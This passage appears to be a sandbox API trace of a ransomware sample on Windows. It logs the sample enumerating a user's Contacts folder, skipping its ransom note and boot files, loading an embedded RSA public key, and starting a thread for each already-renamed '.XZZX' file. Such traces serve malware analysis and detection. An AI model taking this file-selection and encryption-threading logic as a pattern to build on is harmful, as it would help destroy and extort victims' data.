lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0227.789] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.789] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0227.789] SetErrorMode (uMode=0x1) returned 0x1 [0227.789] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0227.789] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0227.789] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0227.789] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0227.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0227.790] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0227.790] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0227.790] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0227.790] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="ntldr") returned 0x0 [0227.790] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="NTLDR") returned 0x0 [0227.790] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0227.790] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="ntdetect.com") returned 0x0 [0227.790] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0227.790] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0227.790] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0227.790] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.790] lstrcpyW (in: lpString1=0x17cf1c, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0227.790] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0227.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10ac [0227.791] Sleep (dwMilliseconds=0x96) [0227.937] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0227.937] lstrcmpW (lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX", lpString2="..") returned 1 [0227.937] lstrcmpW (lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX", lpString2=".") returned 1 [0227.937] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0227.937] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="ntldr") returned 0x0 [0227.937] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="NTLDR") returned 0x0 [0227.937] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0227.937] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0227.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0227.937] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0227.937] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0227.937] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.937] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0227.937] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0227.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10b0 [0227.938] WaitForSingleObject (hHandle=0x10b0, dwMilliseconds=0xffffffff) returned 0x0 [0227.938] Sleep (dwMilliseconds=0x96) [0228.095] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.095] lstrcmpW (lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpString2="..") returned 1 [0228.095] lstrcmpW (lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpString2=".") returned 1 [0228.095] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.095] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="ntldr") returned 0x0 [0228.095] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="NTLDR") returned 0x0 [0228.095] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.095] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.095] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0228.095] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0228.095] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0228.095] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.095] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0228.095] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10b4 [0228.095] Sleep (dwMilliseconds=0x96) [0228.257] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.257] lstrcmpW (lpString1="63AB35AD17277526536F22E31B54596E.XZZX", lpString2="..") returned 1 [0228.257] lstrcmpW (lpString1="63AB35AD17277526536F22E31B54596E.XZZX", lpString2=".") returned 1 [0228.258] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.258] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="ntldr") returned 0x0 [0228.258] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="NTLDR") returned 0x0 [0228.258] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.258] StrStrW (lpFirst="63AB35AD17277526536F22E31B54596E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.258] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0228.258] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0228.258] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0228.258] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.258] lstrcpyW (in: lpString1=0x17cf1c, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: lpString1="63AB35AD17277526536F22E31B54596E.XZZX") returned="63AB35AD17277526536F22E31B54596E.XZZX" [0228.258] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10b8 [0228.258] Sleep (dwMilliseconds=0x96) [0228.405] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.405] lstrcmpW (lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX", lpString2="..") returned 1 [0228.405] lstrcmpW (lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX", lpString2=".") returned 1 [0228.405] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.405] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="ntldr") returned 0x0 [0228.405] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="NTLDR") returned 0x0 [0228.405] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.405] StrStrW (lpFirst="8C424C551A76D4366F1622171E8EB87E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.405] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0228.405] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0228.405] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0228.405] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.405] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8C424C551A76D4366F1622171E8EB87E.XZZX" | out: lpString1="8C424C551A76D4366F1622171E8EB87E.XZZX") returned="8C424C551A76D4366F1622171E8EB87E.XZZX" [0228.405] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10bc [0228.406] Sleep (dwMilliseconds=0x96) [0228.561] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.561] lstrcmpW (lpString1="8DFF43342C68841C83BDE75D30616864.XZZX", lpString2="..") returned 1 [0228.561] lstrcmpW (lpString1="8DFF43342C68841C83BDE75D30616864.XZZX", lpString2=".") returned 1 [0228.561] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.561] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="ntldr") returned 0x0 [0228.561] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="NTLDR") returned 0x0 [0228.561] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.561] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.561] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0228.561] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0228.561] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0228.561] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.561] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0228.561] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c0 [0228.562] Sleep (dwMilliseconds=0x96) [0228.717] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.717] lstrcmpW (lpString1="FD82D02831F226B04645120F361F0AF8.XZZX", lpString2="..") returned 1 [0228.717] lstrcmpW (lpString1="FD82D02831F226B04645120F361F0AF8.XZZX", lpString2=".") returned 1 [0228.717] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.717] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="ntldr") returned 0x0 [0228.717] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="NTLDR") returned 0x0 [0228.717] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.717] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.717] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0228.717] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0228.717] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0228.717] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0228.717] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0228.717] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0228.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c4 [0228.718] Sleep (dwMilliseconds=0x96) [0228.874] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.874] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0228.874] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0228.874] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0228.874] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0228.874] FindClose (in: hFindFile=0x3cde9d8 | out: 